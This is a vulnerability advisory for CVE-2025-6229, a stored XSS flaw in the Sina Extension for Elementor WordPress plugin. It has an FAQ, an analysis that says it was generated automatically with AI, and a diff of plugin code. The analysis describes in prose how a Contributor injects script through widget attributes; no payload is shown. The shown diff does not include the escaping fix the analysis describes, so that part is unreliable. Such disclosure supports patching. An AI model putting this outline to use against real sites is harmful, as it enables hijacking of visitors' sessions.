What is CVE -2025-6229?

CVE-2025-6229 is a stored cross-site scripting (XSS) vulnerability in the Sina Extension for Elementor plugin for WordPress. It allows authenticated users with Contributor-level access or higher to inject arbitrary JavaScript into pages via the Fancy Text Widget and Countdown Widget due to insufficient input sanitization.

How does the vulnerability work?

The vulnerability occurs when user input is directly rendered into DOM attributes without proper escaping. Authenticated attackers can create or edit posts using Elementor, inject malicious scripts into widget parameters, and when other users view the affected pages, the scripts execute in their browsers.

Who is affected by this vulnerability?

Any WordPress site using the Sina Extension for Elementor plugin version 3.7.0 or earlier is affected. This includes sites where users have Contributor-level access or higher, allowing them to potentially exploit the vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Sina Extension for Elementor plugin installed. If it is version 3.7.0 or earlier, your site is at risk. Additionally, review user roles to identify if any users have Contributor-level access or higher.

How can I fix the vulnerability?

To fix CVE-2025-6229, update the Sina Extension for Elementor plugin to version 3.7.1 or later, where the vulnerability is patched. Regularly check for updates to all plugins and themes to maintain security.

What does the risk level of 'Medium' mean?

A ‘Medium’ risk level indicates that the vulnerability poses a moderate risk to affected systems. While exploitation requires authenticated access, the potential for significant impact, such as session hijacking or content manipulation, makes it important to address promptly.

What is the CVSS score of this vulnerability?

CVE-2025-6229 has a CVSS score of 6.4, which reflects its medium severity. This score is derived from factors like exploitability, impact on confidentiality, integrity, and availability, and provides a standardized way to assess the risk.

What is stored cross-site scripting (XSS)?

Stored cross-site scripting (XSS) is a type of vulnerability where an attacker can inject malicious scripts into content that is stored on the server. When users access the affected content, the scripts execute in their browsers, potentially leading to data theft or unauthorized actions.

How does the proof of concept demonstrate the issue?

The proof of concept provided demonstrates how an authenticated user can exploit the vulnerability by injecting a malicious payload into widget attributes. It outlines the steps to authenticate and execute the attack, illustrating the ease of exploitation for users with the necessary permissions.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Sina Extension for Elementor plugin until it can be updated. Additionally, review user roles and restrict access to prevent potential exploitation by Contributor-level users.

Are there any other security measures I should take?

In addition to updating vulnerable plugins, ensure that all user accounts have appropriate permissions, implement strong password policies, and consider using security plugins that monitor for vulnerabilities and unauthorized changes.

Where can I find more information about this vulnerability?

More information about CVE-2025-6229 can be found on the official CVE database, security advisories from the plugin developers, and security-focused blogs that analyze vulnerabilities in WordPress plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 23, 2026

CVE-2025-6229: Sina Extension for Elementor (Slider, Gallery, Form, Modal, Data Table, Tab, Particle, Free Elementor Widgets & Elementor Templates) <= 3.7.0 – Authenticated (Contributor+) Stored Cross-Site Scripting via `Fancy Text Widget` And `Countdown Widget` (sina-extension-for-elementor)

CVE ID CVE-2025-6229

Plugin sina-extension-for-elementor

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 3.7.0

Patched Version 3.7.1

Disclosed March 21, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-6229:
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Sina Extension for Elementor WordPress plugin. The vulnerability affects the Fancy Text Widget and Countdown Widget components in versions up to and including 3.7.0. Attackers with Contributor-level access or higher can inject arbitrary JavaScript payloads that execute when users view pages containing the malicious widgets.

The root cause is insufficient input sanitization and output escaping for DOM attributes in the affected widgets. The vulnerability manifests in the widget rendering code where user-controlled input flows into DOM attribute values without proper escaping. Atomic Edge research identified the vulnerable code paths in the widget rendering functions where attributes like `data-settings` and other widget parameters accept unsanitized user input. The diff shows extensive code restructuring but the specific vulnerable lines involve attribute handling in the widget frontend output.

Exploitation requires authenticated access with at least Contributor privileges. Attackers would create or edit a post/page using Elementor, add either the Fancy Text Widget or Countdown Widget, and inject malicious JavaScript payloads into widget parameters that flow into DOM attributes. The payloads would be stored in the post content and execute when any user views the compromised page. The attack vector uses the standard Elementor editor interface through POST requests to `/wp-admin/admin-ajax.php` with action parameters like `elementor_ajax`.

The patch implements proper output escaping for DOM attributes in the affected widgets. The code changes add escaping functions like `esc_attr()` and `wp_kses()` to sanitize user input before it’s rendered in HTML attributes. The diff shows the removal of the vulnerable `sina-ext-templates-readable.php` file and consolidation into a minified version, but the critical fix is in the widget rendering logic where attribute values now undergo proper sanitization. Before the patch, user input flowed directly into attributes; after the patch, all dynamic attribute values pass through WordPress escaping functions.

Successful exploitation allows attackers to execute arbitrary JavaScript in the context of authenticated users viewing compromised pages. This can lead to session hijacking, account takeover, content manipulation, and privilege escalation. Since the vulnerability affects stored content, a single injection affects all users who view the page, making it particularly dangerous for sites with multiple contributors.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/sina-extension-for-elementor/admin/sina-ext-templates-readable.php
+++ b/sina-extension-for-elementor/admin/sina-ext-templates-readable.php
@@ -1,379 +0,0 @@
-<?php
-namespace Sina_Extension;
-
-// Exit if accessed directly.
-if ( !defined('ABSPATH') ) {
-	exit();
-}
-
-use ElementorPlugin;
-use ElementorTemplateLibrarySource_Base;
-use ElementorTemplateLibrarySource_Local;
-use ElementorCoreCommonModulesAjaxModule as Ajax;
-use ElementorUser;
-
-class Sina_Ext_Templates_Library{
-	public static function init() {
-		if ( !empty( get_option('sina_templates_option') ) ) {
-			add_action('elementor/init', [__CLASS__, 'register_source']);
-			add_action('elementor/editor/after_enqueue_scripts', [__CLASS__, 'enqueue_editor_scripts']);
-			add_action('elementor/ajax/register_actions', [__CLASS__, 'register_ajax_actions']);
-			add_action('elementor/editor/footer', [__CLASS__, 'render_template']);
-		}
-	}
-
-	public static function logo() {
-		return defined('SINA_EXT_PRO_URL') ? SINA_EXT_PRO_URL . 'assets/img/logo.png' : SINA_EXT_URL . 'admin/assets/img/logo.png';
-	}
-
-	public static function register_source() {
-		Plugin::$instance->templates_manager->register_source(__NAMESPACE__ . 'Sina_Ext_Templates_Source');
-	}
-
-	public static function enqueue_editor_scripts() {
-		wp_enqueue_script('sina-templates-lib', SINA_EXT_URL . 'admin/assets/js/sina-templates-lib.js', ['jquery', 'backbone-marionette', 'backbone-radio', 'elementor-common-modules', 'elementor-dialog'], SINA_EXT_VERSION, true);
-		wp_localize_script('sina-templates-lib', 'sina_ext_templates_lib', ['logoUrl' => self::logo()]);
-	}
-
-	public static function register_ajax_actions( Ajax $ajax ) {
-		$library_ajax_requests = ['sina_get_library_data'];
-
-		foreach ( $library_ajax_requests as $ajax_request ) {
-			$ajax->register_ajax_action($ajax_request, function($data) use($ajax_request) {
-				return self::handle_ajax_request($ajax_request, $data);
-			});
-		}
-	}
-
-	private static function handle_ajax_request( $ajax_request, array $data ) {
-		if ( !User::is_current_user_can_edit_post_type(Source_Local::CPT) ) {
-			throw new Exception('Access Denied');
-		}
-
-		if ( !empty($data['editor_post_id']) ) {
-			$editor_post_id = absint($data['editor_post_id']);
-
-			if ( !get_post($editor_post_id) ) {
-				throw new Exception( __('Post not found.', 'sina-ext') );
-			}
-
-			Plugin::$instance->db->switch_to_post($editor_post_id);
-		}
-
-		$result = call_user_func([__CLASS__, $ajax_request], $data);
-
-		if ( is_wp_error($result) ) {
-			throw new Exception( $result->get_error_message() );
-		}
-
-		return $result;
-	}
-
-	public static function sina_get_library_data( array $args ) {
-		$library_data = self::get_library_data( !empty($args['sync']) );
-
-		Plugin::$instance->documents->get_document_types();
-
-		return[
-			'templates' => self::get_templates(),
-			'config' => $library_data['types_data'],
-		];
-	}
-
-	public static function get_library_data( $force_update = false ) {
-		return self::get_templates_data($force_update);
-	}
-
-	private static function get_templates_data( $force_update = false ) {
-		$type = get_option('sina_ext_type');
-		$key = ('pro' == $type) ? get_option('sina_ext_pro_license_key') : get_option('sina_ext_license_key');
-		$url = self::$api_info_url . '&type=' . $type . '&dom=' . get_option('siteurl') . '&key=' . $key . '&version=' . SINA_EXT_VERSION;
-		$response = wp_remote_get($url, ['timeout' => 60]);
-		$info_data = json_decode(wp_remote_retrieve_body($response), true);
-		$templates = [];
-
-		if ( isset($info_data['library']['templates']) && !empty($info_data['library']['templates']) ) {
-			$templates = $info_data['library'];
-		}
-
-		return $templates;
-	}
-
-	public static function get_templates() {
-		$source = Plugin::$instance->templates_manager->get_source('sina_ext');
-		return $source->get_items();
-	}
-
-	public static function ajax_reset_api_data() {
-		check_ajax_referer('elementor_reset_library', '_nonce');
-		self::get_templates_data(true);
-		wp_send_json_success();
-	}
-
-	public static function get_template_content( $template_id ) {
-		$type = get_option('sina_ext_type');
-		$key = ('pro' == $type) ? get_option('sina_ext_pro_license_key') : get_option('sina_ext_license_key');
-		$url = sprintf(self::$api_get_template_content_url . '&type=' . $type . '&dom=' . get_option('siteurl') . '&key=' . $key, $template_id);
-		$response = wp_remote_get($url, ['timeout' => 60]);
-		$data = json_decode(wp_remote_retrieve_body($response), true);
-		$response_code = (int) wp_remote_retrieve_response_code($response);
-
-		if ( !$response_code ) {
-			return new WP_Error(500, 'No Response');
-		}
-
-		if ( false === $data ) {
-			return new WP_Error(422, 'Wrong Server Response');
-		}
-
-		return $data;
-	}
-
-	public static function render_template() {
-		?>
-		<script type="text/template" id="tmpl-elementor-template-library-header-actions-sina-ext">
-			<div id="elementor-template-library-header-sync" class="elementor-templates-modal__header__item">
-				<i class="eicon-sync" aria-hidden="true" title="<?php echo esc_attr__('Sync Templates', 'sina-ext'); ?>"></i>
-				<span class="elementor-screen-only"><?php echo esc_html__('Sync Templates', 'sina-ext'); ?></span>
-			</div>
-		</script>
-
-		<script type="text/template" id="tmpl-elementor-templates-modal__header__logo-sina-ext">
-			<span class="elementor-templates-modal__header__logo__icon-wrapper">
-				<img src="<?php echo esc_url( self::logo() ); ?>" style="height: 30px;" />
-			</span>
-			<span class="elementor-templates-modal__header__logo__title">
-				{{{ title }}}
-			</span>
-		</script>
-
-		<script type="text/template" id="tmpl-elementor-template-library-header-preview-sina-ext">
-			<div id="elementor-template-library-header-preview-insert-wrapper" class="elementor-templates-modal__header__item">
-				{{{ sina_ext_templates_lib.templates.layout.getTemplateActionButton( obj ) }}}
-			</div>
-		</script>
-
-		<script type="text/template" id="tmpl-elementor-template-library-templates-sina-ext">
-			<# var activeSource = sina_ext_templates_lib.templates.getFilter('source'); #>
-
-			<div id="elementor-template-library-toolbar">
-				<# if ( 'sina_ext' === activeSource ) {
-					var activeType = sina_ext_templates_lib.templates.getFilter('type');
-					#>
-					<div id="elementor-template-library-filter-toolbar-remote" class="elementor-template-library-filter-toolbar">
-						<# if ( 'new_page' === activeType ) { #>
-							<div id="elementor-template-library-order">
-								<input type="radio" id="elementor-template-library-order-new" class="elementor-template-library-order-input" name="elementor-template-library-order" value="date">
-
-								<label for="elementor-template-library-order-new" class="elementor-template-library-order-label">
-									<?php echo esc_html__('New', 'sina-ext'); ?>
-								</label>
-
-								<input type="radio" id="elementor-template-library-order-trend" class="elementor-template-library-order-input" name="elementor-template-library-order" value="trendIndex">
-
-								<label for="elementor-template-library-order-trend" class="elementor-template-library-order-label">
-									<?php echo esc_html__('Trend', 'sina-ext'); ?>
-								</label>
-
-								<input type="radio" id="elementor-template-library-order-popular" class="elementor-template-library-order-input" name="elementor-template-library-order" value="popularityIndex">
-
-								<label for="elementor-template-library-order-popular" class="elementor-template-library-order-label">
-									<?php echo esc_html__('Popular', 'sina-ext'); ?>
-								</label>
-							</div>
-						<# } else {
-							var config = sina_ext_templates_lib.templates.getConfig( activeType );
-							if ( config.categories ) {
-								#>
-								<div id="elementor-template-library-filter">
-									<select id="elementor-template-library-filter-subtype" class="elementor-template-library-filter-select" data-elementor-filter="subtype">
-										<option></option>
-										<# config.categories.forEach( function( category ) {
-											var selected = category === sina_ext_templates_lib.templates.getFilter( 'subtype' ) ? ' selected' : '';
-											#>
-											<option value="{{ category }}" {{{ selected }}}>
-												{{{ category }}}
-											</option>
-										<# }); #>
-									</select>
-								</div>
-						<# }} #>
-
-						<div id="elementor-template-library-my-favorites">
-							<# var checked = sina_ext_templates_lib.templates.getFilter( 'favorite' ) ? ' checked' : ''; #>
-
-							<input id="elementor-template-library-filter-my-favorites" type="checkbox" {{{ checked }}}>
-							<label id="elementor-template-library-filter-my-favorites-label" for="elementor-template-library-filter-my-favorites">
-								<i class="eicon" aria-hidden="true"></i>
-								<?php echo esc_html__('My Favorites', 'sina-ext'); ?>
-							</label>
-						</div>
-					</div>
-				<# } #>
-
-				<div id="elementor-template-library-filter-text-wrapper">
-					<label for="elementor-template-library-filter-text" class="elementor-screen-only">
-						<?php echo esc_html__('Search Templates:', 'sina-ext'); ?>
-					</label>
-
-					<input id="elementor-template-library-filter-text" placeholder="<?php echo esc_attr__('Search', 'sina-ext'); ?>">
-					<i class="eicon-search"></i>
-				</div>
-			</div>
-
-			<div id="elementor-template-library-templates-container"></div>
-
-			<# if ( 'sina_ext' === activeSource ) { #>
-				<div id="elementor-template-library-footer-banner">
-					<img class="elementor-nerd-box-icon" src="<?php echo esc_url(ELEMENTOR_ASSETS_URL.'images/information.svg'); ?>" />
-					<div class="elementor-excerpt">
-						<?php echo esc_html__('Stay tuned! More awesome templates coming real soon.','sina-ext'); ?>
-					</div>
-				</div>
-			<# } #>
-		</script>
-
-		<script type="text/template" id="tmpl-elementor-template-library-template-sina-ext">
-			<div class="elementor-template-library-template-body">
-				<# if ( 'page' === type ) { #>
-					<div class="elementor-template-library-template-screenshot" style="background-image: url({{ thumbnail }});"></div>
-				<# } else { #>
-					<img src="{{ thumbnail }}">
-				<# } #>
-
-				<div class="elementor-template-library-template-preview">
-					<i class="eicon-zoom-in-bold" aria-hidden="true"></i>
-				</div>
-			</div>
-
-			<div class="elementor-template-library-template-footer">
-				{{{ sina_ext_templates_lib.templates.layout.getTemplateActionButton( obj ) }}}
-
-				<div class="elementor-template-library-template-name">
-					{{{ title }}} - {{{ type }}}
-				</div>
-
-				<div class="elementor-template-library-favorite">
-					<input id="elementor-template-library-template-{{ template_id }}-favorite-input" class="elementor-template-library-template-favorite-input" type="checkbox" {{ favorite ? " checked" : "" }}>
-
-					<label for="elementor-template-library-template-{{ template_id }}-favorite-input" class="elementor-template-library-template-favorite-label">
-						<i class="eicon-heart-o" aria-hidden="true"></i>
-						<span class="elementor-screen-only"><?php echo esc_html__('Favorite', 'sina-ext'); ?></span>
-					</label>
-				</div>
-			</div>
-		</script>
-
-		<script type="text/template" id="tmpl-elementor-template-library-get-pro-button-sina-ext">
-			<a class="elementor-template-library-template-action elementor-button elementor-go-pro" href="https://sina-extension.sinaextra.com/#pricing" target="_blank">
-				<i class="eicon-external-link-square" aria-hidden="true"></i>
-				<span class="elementor-button-title"><?php echo __('Go Pro', 'sina-ext'); ?></span>
-			</a>
-		</script>
-
-		<script type="text/template" id="tmpl-elementor-pro-template-library-activate-license-button-sina-ext">
-			<a class="elementor-template-library-template-action elementor-button elementor-go-pro" href="<?php echo admin_url('/admin.php?page=sina_ext_settings'); ?>" target="_blank">
-				<i class="eicon-external-link-square"></i>
-				<span class="elementor-button-title"><?php echo esc_html__('Enter License Key', 'sina-ext'); ?></span>
-			</a>
-		</script>
-		<?php
-	}
-
-	public static $api_info_url = 'https://sinaextra.com/account/api/v1/sina-ext/get/?data=lib';
-
-	private static $api_get_template_content_url = 'https://sinaextra.com/account/api/v1/sina-ext/get/?data=%d';
-}
-
-Sina_Ext_Templates_Library::init();
-
-class Sina_Ext_Templates_Source extends Source_Base{
-	public function get_id() {
-		return 'sina_ext';
-	}
-
-	public function get_title() {
-		return esc_html__('Sina Templates', 'sina-ext');
-	}
-
-	public function register_data() {}
-
-	public function get_items( $args = [] ) {
-		$library_data = Sina_Ext_Templates_Library::get_library_data();
-		$templates = [];
-		$pro_status = 'inactive';
-		$options = get_option('sina_ext_pro_validity');
-		$is_pro = defined('SINA_EXT_PRO_VERSION');
-
-		if ( $is_pro && isset($options['is_license']) && 'active' == $options['is_license'] ) {
-			$pro_status = $options['is_license'];
-		} elseif ( $is_pro ) {
-			$pro_status = 'license_inactive';
-		}
-
-		if ( !empty($library_data['templates']) ) {
-			foreach ( $library_data['templates'] as $template_data ) {
-				$data = $this->prepare_template($template_data);
-				$data['proStatus'] = $pro_status;
-				$templates[] = $data;
-			}
-		}
-
-		return $templates;
-	}
-
-	public function get_item( $template_id ) {
-		$templates = $this->get_items();
-		return $templates[$template_id];
-	}
-
-	public function save_item( $template_data ) {
-		return new WP_Error('invalid_request', 'Cannot save template to a remote source');
-	}
-
-	public function update_item( $new_data ) {
-		return new WP_Error('invalid_request', 'Cannot update template to a remote source');
-	}
-
-	public function delete_template( $template_id ) {
-		return new WP_Error('invalid_request', 'Cannot delete template from a remote source');
-	}
-
-	public function export_template( $template_id ) {
-		return new WP_Error('invalid_request', 'Cannot export template from a remote source');
-	}
-
-	public function get_data( array $args, $context = 'display' ) {
-		$data = Sina_Ext_Templates_Library::get_template_content($args['template_id']);
-		$data = (array) $data;
-		$data['content'] = $this->replace_elements_ids($data['content']);
-		$data['content'] = $this->process_export_import_content($data['content'], 'on_import');
-		$post_id = $args['editor_post_id'];
-		$document = Plugin::$instance->documents->get($post_id);
-
-		if ( $document ) {
-			$data['content'] = $document->get_elements_raw_data($data['content'], true);
-		}
-
-		return $data;
-	}
-
-	private function prepare_template( array $template_data ) {
-		$favorite_templates = $this->get_user_meta('favorites');
-
-		return[
-			'template_id' 	=> $template_data['id'],
-			'source' 		=> $this->get_id(),
-			'type' 			=> $template_data['type'],
-			'subtype' 		=> $template_data['subtype'],
-			'title' 		=> $template_data['title'],
-			'thumbnail' 	=> $template_data['thumbnail'],
-			'date' 			=> $template_data['tmpl_created'],
-			'author' 		=> $template_data['author'],
-			'tags' 			=> json_decode($template_data['tags']),
-			'isPro' 		=> $template_data['is_pro'],
-			'url' 			=> $template_data['url'],
-			'favorite' 		=> !empty($favorite_templates[ $template_data['id'] ]),
-		];
-	}
-}
 No newline at end of file
--- a/sina-extension-for-elementor/admin/sina-ext-templates.php
+++ b/sina-extension-for-elementor/admin/sina-ext-templates.php
@@ -1,4 +1,4 @@
-<?php namespace Sina_Extension;use ElementorPlugin;use ElementorTemplateLibrarySource_Base;use ElementorTemplateLibrarySource_Local;use ElementorCoreCommonModulesAjaxModule as Ajax;use ElementorUser;class Sina_Ext_Templates_Library{public static function init(){if(!empty(get_option('sina_templates_option'))){add_action('elementor/init',[__CLASS__,'register_source']);add_action('elementor/editor/after_enqueue_scripts',[__CLASS__,'enqueue_editor_scripts']);add_action('elementor/ajax/register_actions',[__CLASS__,'register_ajax_actions']);add_action('elementor/editor/footer',[__CLASS__,'render_template']);}}public static function logo(){return defined('SINA_EXT_PRO_URL')?SINA_EXT_PRO_URL.'assets/img/logo.png':SINA_EXT_URL.'admin/assets/img/logo.png';}public static function register_source(){Plugin::$instance->templates_manager->register_source(__NAMESPACE__.'Sina_Ext_Templates_Source');}public static function enqueue_editor_scripts(){wp_enqueue_script('sina-templates-lib',SINA_EXT_URL.'admin/assets/js/sina-templates-lib.js',['jquery','backbone-marionette','backbone-radio','elementor-common-modules','elementor-dialog',],SINA_EXT_VERSION,true);wp_localize_script('sina-templates-lib','sina_ext_templates_lib',array('logoUrl'=>self::logo(),));}public static function register_ajax_actions(Ajax $ajax){$library_ajax_requests=['sina_get_library_data',];foreach($library_ajax_requests as $ajax_request){$ajax->register_ajax_action($ajax_request,function($data)use($ajax_request){return self::handle_ajax_request($ajax_request,$data);});}}private static function handle_ajax_request($ajax_request,array $data){if(!User::is_current_user_can_edit_post_type(Source_Local::CPT)){throw new Exception('Access Denied');}if(!empty($data['editor_post_id'])){$editor_post_id=absint($data['editor_post_id']);if(!get_post($editor_post_id)){throw new Exception(__('Post not found.','sina-ext'));}Plugin::$instance->db->switch_to_post($editor_post_id);}$result=call_user_func([__CLASS__,$ajax_request],$data);if(is_wp_error($result)){throw new Exception($result->get_error_message());}return $result;}public static function sina_get_library_data(array $args){$library_data=self::get_library_data(!empty($args['sync']));Plugin::$instance->documents->get_document_types();return['templates'=>self::get_templates(),'config'=>$library_data['types_data'],];}public static function get_library_data($force_update=false){return self::get_templates_data($force_update);}private static function get_templates_data($force_update=false){$type=get_option('sina_ext_type');$key=('pro'==$type)?get_option('sina_ext_pro_license_key'):get_option('sina_ext_license_key');$url=self::$api_info_url.'&type='.$type.'&dom='.get_option('siteurl').'&key='.$key.'&version='.SINA_EXT_VERSION;$response=wp_remote_get($url,['timeout'=>60]);$info_data=json_decode(wp_remote_retrieve_body($response),true);$templates=[];if(isset($info_data['library']['templates'])&&!empty($info_data['library']['templates'])){$templates=$info_data['library'];}return $templates;}public static function get_templates(){$source=Plugin::$instance->templates_manager->get_source('sina_ext');return $source->get_items();}public static function ajax_reset_api_data(){check_ajax_referer('elementor_reset_library','_nonce');self::get_templates_data(true);wp_send_json_success();}public static function get_template_content($template_id){$type=get_option('sina_ext_type');$key=('pro'==$type)?get_option('sina_ext_pro_license_key'):get_option('sina_ext_license_key');$url=sprintf(self::$api_get_template_content_url.'&type='.$type.'&dom='.get_option('siteurl').'&key='.$key,$template_id);$response=wp_remote_get($url,['timeout'=>60]);$data=json_decode(wp_remote_retrieve_body($response),true);$response_code=(int) wp_remote_retrieve_response_code($response);if(!$response_code){return new WP_Error(500,'No Response');}if(false===$data){return new WP_Error(422,'Wrong Server Response');}return $data;}public static function render_template(){ ?>
+<?php namespace Sina_Extension;use ElementorPlugin;use ElementorTemplateLibrarySource_Base;use ElementorTemplateLibrarySource_Local;use ElementorCoreCommonModulesAjaxModule as Ajax;use ElementorUser;class Sina_Ext_Templates_Library{public static function init(){if(!empty(get_option('sina_templates_option'))){add_action('elementor/init',[__CLASS__,'register_source']);add_action('elementor/editor/after_enqueue_scripts',[__CLASS__,'enqueue_editor_scripts']);add_action('elementor/ajax/register_actions',[__CLASS__,'register_ajax_actions']);add_action('elementor/editor/footer',[__CLASS__,'render_template']);}}public static function logo(){return defined('SINA_EXT_PRO_URL')?SINA_EXT_PRO_URL.'assets/img/logo.png':SINA_EXT_URL.'admin/assets/img/logo.png';}public static function register_source(){Plugin::$instance->templates_manager->register_source(__NAMESPACE__.'Sina_Ext_Templates_Source');}public static function enqueue_editor_scripts(){wp_enqueue_script('sina-templates-lib',SINA_EXT_URL.'admin/assets/js/sina-templates-lib.min.js',['jquery','backbone-marionette','backbone-radio','elementor-common-modules','elementor-dialog',],SINA_EXT_VERSION,true);wp_localize_script('sina-templates-lib','sina_ext_templates_lib',array('logoUrl'=>self::logo(),));}public static function register_ajax_actions(Ajax $ajax){$library_ajax_requests=['sina_get_library_data',];foreach($library_ajax_requests as $ajax_request){$ajax->register_ajax_action($ajax_request,function($data)use($ajax_request){return self::handle_ajax_request($ajax_request,$data);});}}private static function handle_ajax_request($ajax_request,array $data){if(!User::is_current_user_can_edit_post_type(Source_Local::CPT)){throw new Exception('Access Denied');}if(!empty($data['editor_post_id'])){$editor_post_id=absint($data['editor_post_id']);if(!get_post($editor_post_id)){throw new Exception(__('Post not found.','sina-ext'));}Plugin::$instance->db->switch_to_post($editor_post_id);}$result=call_user_func([__CLASS__,$ajax_request],$data);if(is_wp_error($result)){throw new Exception($result->get_error_message());}return $result;}public static function sina_get_library_data(array $args){$library_data=self::get_library_data(!empty($args['sync']));Plugin::$instance->documents->get_document_types();return['templates'=>self::get_templates(),'config'=>$library_data['types_data'],];}public static function get_library_data($force_update=false){return self::get_templates_data($force_update);}private static function get_templates_data($force_update=false){$type=get_option('sina_ext_type');$key=('pro'==$type)?get_option('sina_ext_pro_license_key'):get_option('sina_ext_license_key');$url=self::$api_info_url.'&type='.$type.'&dom='.get_option('siteurl').'&key='.$key.'&version='.SINA_EXT_VERSION;$response=wp_remote_get($url,['timeout'=>60]);$info_data=json_decode(wp_remote_retrieve_body($response),true);$templates=[];if(isset($info_data['library']['templates'])&&!empty($info_data['library']['templates'])){$templates=$info_data['library'];}return $templates;}public static function get_templates(){$source=Plugin::$instance->templates_manager->get_source('sina_ext');return $source->get_items();}public static function ajax_reset_api_data(){check_ajax_referer('elementor_reset_library','_nonce');self::get_templates_data(true);wp_send_json_success();}public static function get_template_content($template_id){$type=get_option('sina_ext_type');$key=('pro'==$type)?get_option('sina_ext_pro_license_key'):get_option('sina_ext_license_key');$url=sprintf(self::$api_get_template_content_url.'&type='.$type.'&dom='.get_option('siteurl').'&key='.$key,$template_id);$response=wp_remote_get($url,['timeout'=>60]);$data=json_decode(wp_remote_retrieve_body($response),true);$response_code=(int) wp_remote_retrieve_response_code($response);if(!$response_code){return new WP_Error(500,'No Response');}if(false===$data){return new WP_Error(422,'Wrong Server Response');}return $data;}public static function render_template(){ ?>
 		<script type="text/template" id="tmpl-elementor-template-library-header-actions-sina-ext">
 			<div id="elementor-template-library-header-sync" class="elementor-templates-modal__header__item">
 				<i class="eicon-sync" aria-hidden="true" title="<?php echo esc_attr__('Sync Templates','sina-ext'); ?>"></i>
--- a/sina-extension-for-elementor/admin/sina-ext-theme-builder-readable.php
+++ b/sina-extension-for-elementor/admin/sina-ext-theme-builder-readable.php
@@ -1,1176 +0,0 @@
-<?php
-namespace Sina_Extension;
-
-// Exit if accessed directly.
-if ( !defined('ABSPATH') ) {
-	exit();
-}
-
-use ElementorPlugin;
-
-class Sina_Ext_Theme_Builder{
-	const POST_TYPE = 'sina-ext-template';
-	const POST_TYPE_META = 'sina-ext-template-meta';
-
-	private static $_instance = null;
-
-	public static function instance() {
-		if ( is_null(self::$_instance) ) {
-			self::$_instance = new self();
-		}
-		return self::$_instance;
-	}
-
-	public function __construct() {
-		add_action( 'admin_enqueue_scripts', [$this, 'enqueue_scripts'] );
-		add_action( 'init', [$this, 'register_theme_builder_post_type'] );
-		add_action( 'manage_'.self::POST_TYPE.'_posts_columns', [$this, 'manage_columns'] );
-		add_action( 'manage_'.self::POST_TYPE.'_posts_custom_column', [$this ,'columns_content'] ,10,2 );
-
-		add_action( 'wp_ajax_sina_ext_save_template', [$this, 'save_template'] );
-		add_action( 'wp_ajax_sina_ext_get_template', [$this, 'get_template_by_id'] );
-		add_action( 'wp_ajax_sina_ext_get_posts_by_query', [$this, 'get_posts_by_query'] );
-		add_action( 'admin_footer', [$this, 'print_popup'] );
-		add_action( 'get_header', [$this, 'override_default_header'] );
-		add_action( 'get_footer', [$this, 'override_default_footer'] );
-		add_action( 'sina_ext_header_builder_content', [$this, 'header_builder_content'] );
-		add_action( 'sina_ext_footer_builder_content', [$this, 'footer_builder_content'] );
-		add_action( 'sina_ext_archive_builder_content', [$this, 'archive_page_builder_content'] );
-		add_action( 'sina_ext_single_builder_content', [$this, 'single_page_builder_content'] );
-		add_action( 'sina_ext_others_builder_content', [$this, 'others_page_builder_content'] );
-
-		add_filter( 'parse_query', [$this, 'query_filter'] );
-		add_filter( 'views_edit-'.self::POST_TYPE, [$this, 'print_tabs'] );
-		add_filter( 'template_include', [$this, 'template_loader'] );
-		add_filter( 'body_class', [$this, 'body_classes'] );
-	}
-
-	public function enqueue_scripts( $hook ) {
-		if ( isset($_GET['post_type']) && $_GET['post_type'] == self::POST_TYPE ) {
-			wp_enqueue_style('select2', SINA_EXT_URL . 'admin/assets/css/select2.min.css');
-			wp_enqueue_style('sina-ext-theme-builder', SINA_EXT_URL . 'admin/assets/css/sina-admin-theme-builder.min.css');
-
-			wp_enqueue_script('select2', SINA_EXT_URL . 'admin/assets/js/select2.min.js', ['jquery'], SINA_EXT_VERSION, true);
-			wp_enqueue_script('sina-ext-theme-builder', SINA_EXT_URL . 'admin/assets/js/sina-admin-theme-builder.js', ['jquery', 'wp-util'], SINA_EXT_VERSION, true);
-
-			$localize_data = [
-				'ajaxurl' 			=> admin_url('admin-ajax.php'),
-				'nonce' 			=> wp_create_nonce('sina_ext_tmp_nonce'),
-				'adminURL' 			=> admin_url(),
-				'hflocation' 		=> self::get_hf_select(),
-				'archivelocation' 	=> self::get_archive_select(),
-				'singlelocation' 	=> self::get_single_select(),
-				'otherslocation' 	=> self::get_others_select(),
-				'templatetype' 		=> self::get_template_type(),
-				'labels' => [
-					'fields' => [
-						'name' => [
-							'title' => esc_html__('Name', 'sina-ext'),
-							'placeholder' => esc_html__('Enter a template name', 'sina-ext')
-						],
-						'type' => esc_html__('Type', 'sina-ext'),
-						'display' => esc_html__('Display', 'sina-ext'),
-					],
-					'head' => esc_html__('Template Settings', 'sina-ext'),
-					'buttons' => [
-						'elementor' => [
-							'label' => esc_html__('Edit With Elementor', 'sina-ext'),
-							'link' => '#'
-						],
-						'save' => [
-							'label' => esc_html__('Save Settings', 'sina-ext'),
-							'saving' => esc_html__('Saving...', 'sina-ext'),
-							'saved' => esc_html__('All Data Saved', 'sina-ext'),
-							'link' => '#'
-						]
-					],
-				]
-			];
-
-			wp_localize_script('sina-ext-theme-builder', 'Sina_Ext_Theme_Builder', $localize_data);
-		}
-	}
-
-	public static function get_hf_select() {
-		$args = [
-			'public' => true,
-			'show_in_nav_menus' => true,
-		];
-
-		$post_types = get_post_types($args, 'objects');
-
-		$special_pages = [
-			'front'		=> esc_html__('Front Page', 'sina-ext'),
-			'blog' 		=> esc_html__('Blog / Posts Page', 'sina-ext'),
-			'search' 	=> esc_html__('Search Page', 'sina-ext'),
-			'404' 		=> esc_html__('404 Page', 'sina-ext'),
-			'author' 	=> esc_html__('Author Archive', 'sina-ext'),
-			'date' 		=> esc_html__('Date Archive', 'sina-ext'),
-		];
-
-		if ( class_exists('WooCommerce') ) {
-			$special_pages['woo-shop'] = esc_html__('WooCommerce Shop Page', 'sina-ext');
-		}
-
-		$selection_options = [
-			'basic' => [
-				'label' => esc_html__('Basic', 'sina-ext'),
-				'value' => [
-					'' => esc_html__('None', 'sina-ext'),
-					'global' => esc_html__('Entire Website', 'sina-ext'),
-					'singulars' => esc_html__('All Singulars', 'sina-ext'),
-					'archives' => esc_html__('All Archives', 'sina-ext'),
-				],
-			],
